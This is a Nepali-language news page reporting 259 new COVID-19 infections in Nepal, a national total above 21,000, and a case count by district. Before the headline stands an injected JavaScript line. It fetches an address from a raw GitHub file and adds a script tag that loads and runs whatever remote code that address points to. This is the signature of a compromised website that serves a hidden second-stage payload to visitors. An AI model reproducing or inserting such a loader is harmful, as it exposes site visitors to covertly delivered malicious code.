;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); २५९ जना कोरोना संक्रमित थपिए , संख्या २१ हजार नाघ्यो – जुनेली न्युज
शुक्रबार, साउन ११, २०८२
  • होमपेज
  • २५९ जना कोरोना संक्रमित थपिए , संख्या २१ हजार नाघ्यो
समाचार

२५९ जना कोरोना संक्रमित थपिए , संख्या २१ हजार नाघ्यो

२० साउन,

काठमाडौं । पछिल्लो २४ घण्टामा २५९ जनामा कोरोना भाइरस (कोभिड–१९) संक्रमण पुष्टि भएको छ । देशभरका प्रयोगशालामा ७ हजार ६८७ नमुना परीक्षण गर्दा काठमाडौंका उपत्यकामा मात्र ६२ जनामा संक्रमण पुष्टि भएको छ ।

यससँगै देशभर कुल संक्रमितको संख्या २१ हजार ९ पुगेको छ । उनीहरुमध्ये ५८ जनाको मृत्यु भएको छ भने १५ हजार २० जना निको भएका छन् ।

कहाँ कहाँ थपिए संक्रमित ?

स्वास्थ्य तथा जनसंख्या मन्त्रालयका अनुसार सबैभन्दा धेरै सबैभन्दा धेरै काठमाडौंमा ४८ जना संक्रमित थपिएका छन् ।

यस्तै सर्लाहीका २६, मोरङका २३, कैलालीका २२, महोत्तरीमा १५, भक्तपुर र धनुषाका १३/१३ जना, सुनसरीका १२, अछाम र बाँकेका ११, रुपन्देहीका ९, झापाका ८, सप्तरी र बाराका ७/७ जना र रौतहटका ६ जनालाई कोरोना संक्रमण भएको छ ।

गुल्मीका ५, सल्यानका ३, इलाम, सिरहा, कपिलवस्तु र कास्कीका २/२ जना तथा ललितपुर, धनुषा, बझाङ, पर्सा, तनहुँ, चितवन, लमजुङ र पर्वतका एक/एक जनामा कोरोना संक्रमण पुष्टि भएको स्वास्थ्य मन्त्रालयले जनाएको छ ।

फेसबुक प्रतिक्रियाहरु